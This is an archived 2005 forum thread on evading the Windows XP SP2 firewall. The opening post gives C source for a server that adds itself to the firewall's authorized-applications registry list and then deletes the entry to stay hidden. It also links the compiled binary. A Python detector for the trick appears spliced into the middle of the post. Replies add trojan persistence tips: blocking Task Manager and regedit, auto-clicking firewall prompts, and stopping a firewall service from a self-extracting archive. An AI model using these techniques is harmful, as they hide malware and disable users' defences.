Author Topic: SP2 Firewall  (Read 9692 times)


iago (Leader, Administrator, Hero Member)
SP2 Firewall
« on: September 08, 2005, 09:49:41 am »
This article is about how to open up a listening port on Windows XP SP2 without being logged/listed as open:

Quote
1.9.2005
Mark Kica
crusoe@alexandria.cc
FEI AI Technical University Kosice   
#Dedicated to Katka H. from Levoca



     How to avoid detection of a server application by the Windows XP SP2 firewall

###############################################################################
#Q: How safe is the Windows XP SP2 firewall?
#A: Not very...

 This trick uses only modification of registry keys. The Windows XP SP2 firewall has a
list of allowed programs in the registry which are not blocked. If you add a new key
to it, your server (malware or trojan) can run freely.

The server can also be invisible in the following list:

start->control panel->windows firewall->exceptions


It will become invisible in this list because, after you create the socket, you can remove the registry string value of your server and the connection won't be aborted.

Another way to bypass the SP2 firewall is to create the trojan not as a server, but
as a client.

##################################################################

http://taekwondo-itf.szm.sk/bugg.zip

Test :

#c:\bugg.exe          Server running on port 2001

connect to the server with:

#telnet localhost 2001



##################################################################

Our Registry path is

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List


and there you can create a string value:

Value name:      C:\chat.exe
Value (REG_SZ):  C:\chat.exe:*:Enabled:chat


NO SPACES!!! in the value name etc.: _C:\chat.exe___

#################################################################
Tested on Windows XP Media Center Edition 2005 with integrated SP2

Source code
(the server uses the ezsocket lib; ezsocket(), ezclose_socket() and
ezsocket_exit() are that library's calls as used by the original author)

#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <ezsocket.h>
#include <conio.h>
#include "Shlwapi.h"

/* Per-application exception list of the SP2 firewall (standard profile) */
#define FW_APP_LIST \
    "SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List"

int main( int argc, char *argv [] )
    {
    char rule[1024];       /* "<path>:*:Enabled:bugg", the REG_SZ data   */
    char buffer[1024];     /* receive buffer, kept separate from the rule */
    char filename[1024];   /* full path of this exe = the value name      */

    HKEY hKey;
    int temp, sockfd, new_fd, fd_size;
    struct sockaddr_in remote_addr;

    GetModuleFileName(NULL, filename, sizeof(filename));

    _snprintf(rule, sizeof(rule), "%s:*:Enabled:bugg", filename);
    rule[sizeof(rule) - 1] = '\0';

    /* Writing under HKLM requires an administrative token */
    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, FW_APP_LIST, 0, KEY_ALL_ACCESS, &hKey) != ERROR_SUCCESS)
        {
        fprintf(stderr, "cannot open the firewall exception list (not admin?)\n");
        return 1;
        }

    /* Authorize ourselves before the socket is created; REG_SZ data must be
       passed as bytes and its length must include the terminating NUL */
    RegSetValueEx(hKey, filename, 0, REG_SZ, (const BYTE *)rule, (DWORD)strlen(rule) + 1);

    fprintf(stdout, "Simple server example with Anti SP2 firewall trick    \n");
    fprintf(stdout, "             This is not trojan                       \n");
    fprintf(stdout, "             Opened port is :2001                      \n");
    fprintf(stdout, "author:Mark Kica student of Technical University Kosice\n");
    fprintf(stdout, "Dedicated to Katka H. from Levoca                       \n");

    Sleep(3000);   /* Win32 Sleep() takes milliseconds; sleep(3) is the POSIX call */

    if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
        {
        RegCloseKey(hKey);
        return 0;
        }

    for (; ; )
        {
        /* Remove the exception while waiting for a client, so the program is
           not listed under Windows Firewall -> Exceptions; the author's claim
           is that the already-created socket keeps working without it */
        RegDeleteValue(hKey, filename);
        fd_size = sizeof(struct sockaddr_in);

        if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
            {
            perror("accept");
            continue;
            }
        temp = send(new_fd, "Hello World\r\n", strlen("Hello World\r\n"), 0);
        fprintf(stdout, "Sent: Hello World\r\n");
        temp = recv(new_fd, buffer, sizeof(buffer) - 1, 0);
        if (temp < 0)
            temp = 0;          /* recv error or reset: treat as empty input */
        buffer[temp] = '\0';
        fprintf(stdout, "Received: %s\r\n", buffer);
        ezclose_socket(new_fd);

        /* Put the exception back (the original rewrote it with the receive
           buffer here, i.e. with whatever the client had just sent) */
        RegSetValueEx(hKey, filename, 0, REG_SZ, (const BYTE *)rule, (DWORD)strlen(rule) + 1);

        /* telnet sends "quit\r\n", so compare only the first four bytes */
        if (!strncmp(buffer, "quit", 4))
            break;
        }

    RegCloseKey(hKey);
    ezsocket_exit();
    return 0;
    }
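The defensive side of the trick above, as an added example that is my own code and not part of the post or of Mark Kica's bugg.exe: a listening socket whose owning program has no Enabled entry in the AuthorizedApplications list is exactly the artifact the delete-after-bind technique leaves behind, so a check can compare the registry list with the current TCP listeners. The entry format "<path>:<scope>:Enabled|Disabled:<name>" and the registry path come from the post; the netstat lines, PID-to-image map and registry values below are constructed sample data, the assumption that a display name contains no colon is mine, and port-based exceptions stored elsewhere in the FirewallPolicy tree are not parsed, so system services may also be reported and need triage.

```python
import re
from dataclasses import dataclass

# Registry key from the post (HKLM hive); used only for reporting here.
LIST_KEY = (r"HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters"
            r"\FirewallPolicy\StandardProfile\AuthorizedApplications\List")


@dataclass(frozen=True)
class AuthorizedApp:
    path: str          # full image path; also the value name
    scope: str         # "*" = any remote address
    enabled: bool
    display_name: str


def parse_authorized_app(value_name: str, value_data: str) -> AuthorizedApp:
    """Parse one REG_SZ entry "<path>:<scope>:Enabled|Disabled:<name>".

    The path carries a drive-letter colon, so the data is split from the
    right; this assumes the display name itself has no colon (assumption).
    """
    parts = value_data.rsplit(":", 3)
    if len(parts) != 4:
        raise ValueError(f"malformed entry: {value_data!r}")
    path, scope, state, name = parts
    if state not in ("Enabled", "Disabled"):
        raise ValueError(f"bad state {state!r} in {value_data!r}")
    # The post's "NO SPACES" warning: the value name must equal the path exactly.
    if path.lower() != value_name.lower():
        raise ValueError(f"value name {value_name!r} != path {path!r}")
    return AuthorizedApp(path, scope, state == "Enabled", name)


def is_wellformed(value_name: str, value_data: str) -> bool:
    """True if the entry parses and its value name matches its path field."""
    try:
        parse_authorized_app(value_name, value_data)
        return True
    except ValueError:
        return False


# One `netstat -ano` line for a TCP socket in LISTENING state, e.g.
#   TCP    0.0.0.0:2001    0.0.0.0:0    LISTENING    1780
NETSTAT_LISTEN_RE = re.compile(
    r"^\s*TCP\s+(\S+):(\d+)\s+\S+\s+LISTENING\s+(\d+)\s*$")


def parse_listeners(netstat_output: str):
    """Yield (local_addr, port, pid) for every TCP listener in `netstat -ano` output."""
    for line in netstat_output.splitlines():
        m = NETSTAT_LISTEN_RE.match(line)
        if m:
            yield m.group(1), int(m.group(2)), int(m.group(3))


def uncovered_listeners(registry_values, netstat_output, pid_to_image):
    """Return (addr, port, pid, image) for listeners whose image has no
    *enabled* exception entry. Either the firewall is blocking that socket
    (benign) or the socket was created under an entry that has since been
    deleted, which is the trick described in the post."""
    allowed = set()
    for name, data in registry_values.items():
        app = parse_authorized_app(name, data)
        if app.enabled:
            allowed.add(app.path.lower())
    findings = []
    for addr, port, pid in parse_listeners(netstat_output):
        image = pid_to_image.get(pid, "<unknown>")
        if image.lower() not in allowed:
            findings.append((addr, port, pid, image))
    return findings


# Constructed sample data; not captured from a real machine. On a live host,
# feed it `reg query <LIST_KEY>`, `netstat -ano` and a PID -> image map
# (tasklist or Process Explorer) instead.
SAMPLE_REGISTRY = {
    r"C:\chat.exe": r"C:\chat.exe:*:Enabled:chat",
    r"C:\Program Files\Messenger\msmsgs.exe":
        r"C:\Program Files\Messenger\msmsgs.exe:*:Disabled:Windows Messenger",
}
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:2001           0.0.0.0:0              LISTENING       1780
  TCP    0.0.0.0:4000           0.0.0.0:0              LISTENING       1544
  TCP    0.0.0.0:6891           0.0.0.0:0              LISTENING       1600
  TCP    192.168.0.5:1046       64.12.24.70:443        ESTABLISHED     1600
"""
SAMPLE_PIDS = {
    1780: r"C:\bugg.exe",                            # the post's server, entry deleted
    1544: r"C:\chat.exe",                            # covered by an Enabled entry
    1600: r"C:\Program Files\Messenger\msmsgs.exe",  # entry present but Disabled
}

if __name__ == "__main__":
    for addr, port, pid, image in uncovered_listeners(SAMPLE_REGISTRY, SAMPLE_NETSTAT, SAMPLE_PIDS):
        print(f"{addr}:{port} pid {pid} {image}: no Enabled entry under {LIST_KEY}")
```

On the sample data this reports bugg.exe on port 2001 and the Disabled msmsgs.exe entry, and stays quiet about chat.exe; the comparison is case-insensitive because the value name is a file path.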
 

Quik (Webmaster Guy, x86, Hero Member)
Re: SP2 Firewall
« Reply #1 on: September 08, 2005, 07:00:56 pm »
Thanks, was looking for some information on SP2's firewall recently.
Quote
[20:21:13] xar: i was just thinking about the time iago came over here and we made this huge bomb and light up the sky for 6 min
[20:21:15] xar: that was funny

Joe (B&, x86, Hero Member)
Re: SP2 Firewall
« Reply #2 on: September 11, 2005, 04:57:38 am »
Heh, I wouldn't trust the XP firewall any more than my headphones, even before this.
I'd personally do as Joe suggests

You might be right about that, Joe.


Koga73 (Newbie)
re
« Reply #3 on: September 14, 2005, 10:32:51 pm »
I made a trojan, and to prevent the XP SP2 firewall from doing anything... I just blocked the window name "Windows Security Alert" so it won't display that stupid message. Along with that, when the trojan is installed, it disables the firewall and adds itself to the allowed programs list (registry). The application blocker of my trojan I have set by default to block Task Manager, msconfig, regedit, and Windows Security Alert. So, once it's on, it's not easy to get off :). And the user can add their own blocks if they want.

Newby (x86, Hero Member)
Re: SP2 Firewall
« Reply #4 on: September 14, 2005, 11:24:23 pm »
Uh, it will not display the message, but I'm guessing that it will still block access.

You should set a loop to detect for that window to pop up, and when it does, find the button that says "unblock" and unblock your program from accessing the internet.
- Newby
http://www.x86labs.org

Quote
[17:32:45] * xar sets mode: -oooooooooo algorithm ban chris cipher newby stdio TehUser tnarongi|away vursed warz
[17:32:54] * xar sets mode: +o newby
[17:32:58] <xar> new rule
[17:33:02] <xar> me and newby rule all

I'd bet that you're currently bloated like a water ballon on a hot summer's day.

That analogy doesn't even make sense.  Why would a water balloon be especially bloated on a hot summer's day? For your sake, I hope there wasn't too much logic testing on your LSAT. 

Sidoh (x86, Hero Member)
Re: re
« Reply #5 on: September 15, 2005, 12:53:40 am »
Quote
I made a trojan, and to prevent the XP SP2 firewall from doing anything... I just blocked the window name "Windows Security Alert" so it won't display that stupid message. Along with that, when the trojan is installed, it disables the firewall and adds itself to the allowed programs list (registry). The application blocker of my trojan I have set by default to block Task Manager, msconfig, regedit, and Windows Security Alert. So, once it's on, it's not easy to get off :). And the user can add their own blocks if they want.

How incredibly annoying.  People who program maliciously suck at life.

Koga73 (Newbie)
Re: SP2 Firewall
« Reply #6 on: September 15, 2005, 04:20:12 pm »
When the window closes, it doesn't block it or permanently allow it. It just allows it that time, and next time it'll ask you again.

Joe (B&, x86, Hero Member)
Re: SP2 Firewall
« Reply #7 on: September 15, 2005, 10:48:06 pm »
Koga, waste your time on something better. The Windows firewall doesn't do anything even if you leave it alone.


Screenor (Hero Member)
Re: SP2 Firewall
« Reply #8 on: September 18, 2005, 04:01:06 am »
Quote
Koga, waste your time on something better. The Windows firewall doesn't do anything even if you leave it alone.

Seriously, other than not letting you host games on B.net, it's really got no purpose.

iago (Leader, Administrator, Hero Member)
Re: SP2 Firewall
« Reply #9 on: September 18, 2005, 10:04:42 am »
It blocks incoming traffic.  That will stop a lot of attacks, such as:
MS03-026 (Dcom -- Blaster worm)
MS04-011 (Lsass -- Sasser worm)
MS05-039 (PnP -- Zotob worm)
and many others. 

It's useful for preventing incoming attacks, like worms, but isn't terribly useful for blocking outbound traffic.

drka (Full Member)
Re: SP2 Firewall
« Reply #10 on: September 25, 2005, 08:28:15 pm »
Windows Vista is supposed to have its firewall upgraded so that it does

Quik (Webmaster Guy, x86, Hero Member)
Re: SP2 Firewall
« Reply #11 on: September 25, 2005, 08:43:47 pm »
Quote
Windows Vista is supposed to have its firewall upgraded so that it does

It does what? A dance? Blocks Sasser? Damn, it better.

drka (Full Member)
Re: SP2 Firewall
« Reply #12 on: September 25, 2005, 08:47:31 pm »
blocking outgoing connections, and maybe it will fix the issue where malware can disable it

iago (Leader, Administrator, Hero Member)
Re: SP2 Firewall
« Reply #13 on: September 25, 2005, 09:49:06 pm »
Quote
blocking outgoing connections, and maybe it will fix the issue where malware can disable it

As long as the user can disable it without a password, so can viruses.  And people don't like having to put in a password, so that probably won't change. 

ink (Newbie)
Re: SP2 Firewall
« Reply #14 on: February 14, 2006, 03:05:10 pm »
The XP firewall is easily disabled with an archivirus (sfx scripting);
all you have to do is set it to run this before extraction:

C:\Windows\system32\net.exe stop alg

This command will shut down the "Application Layer Gateway Service", which is responsible for correct functionality of the firewall.

Eric (Full Member)
Re: SP2 Firewall
« Reply #15 on: February 14, 2006, 04:10:00 pm »
and requires administrative access.

ink (Newbie)
Re: SP2 Firewall
« Reply #16 on: February 14, 2006, 04:15:07 pm »
Mhm, I'm not a fan of this anyway, since it makes it somewhat obvious that the system is compromised; just an example.

Berzerker (Newbie)
Re: SP2 Firewall
« Reply #17 on: February 15, 2006, 07:31:23 pm »
Quote
Windows Vista is supposed to have its firewall upgraded so that it does

Isn't Vista just supposed to come with Windows One Care?



Warrior (Hero Member)
Re: SP2 Firewall
« Reply #18 on: February 19, 2006, 01:15:38 pm »
One Care is for live.com; Vista comes with Windows Defender (formerly Windows AntiSpyware Beta 2).
One must ask oneself: "do I will trolling to become a universal law?" And then when one realizes "yes, I do will it to be such," one feels completely justified.
-- from Groundwork for the Metaphysics of Trolling

deadly7 (x86, Hero Member)
Re: SP2 Firewall
« Reply #19 on: February 19, 2006, 04:10:59 pm »
Quote
One Care is for live.com; Vista comes with Windows Defender (formerly Windows AntiSpyware Beta 2).

The "Anti-Spyware" that teamed up with Gator?
[17:42:21.609] <Ergot> Kutsuju you're girlfrieds pussy must be a 403 error for you
 [17:42:25.585] <Ergot> FORBIDDEN

on IRC playing T&T++
<iago> He is unarmed
<Hitmen> he has no arms?!

on AIM with a drunk mythix:
(00:50:05) Mythix: Deadly
(00:50:11) Mythix: I'm going to fuck that red dot out of your head.
(00:50:15) Mythix: with my nine

Warrior (Hero Member)
Re: SP2 Firewall
« Reply #20 on: February 20, 2006, 06:23:10 am »
You mean bought out? Check Defender, it detects and removes it if it is even present. I really don't know why you even start with this *shrug*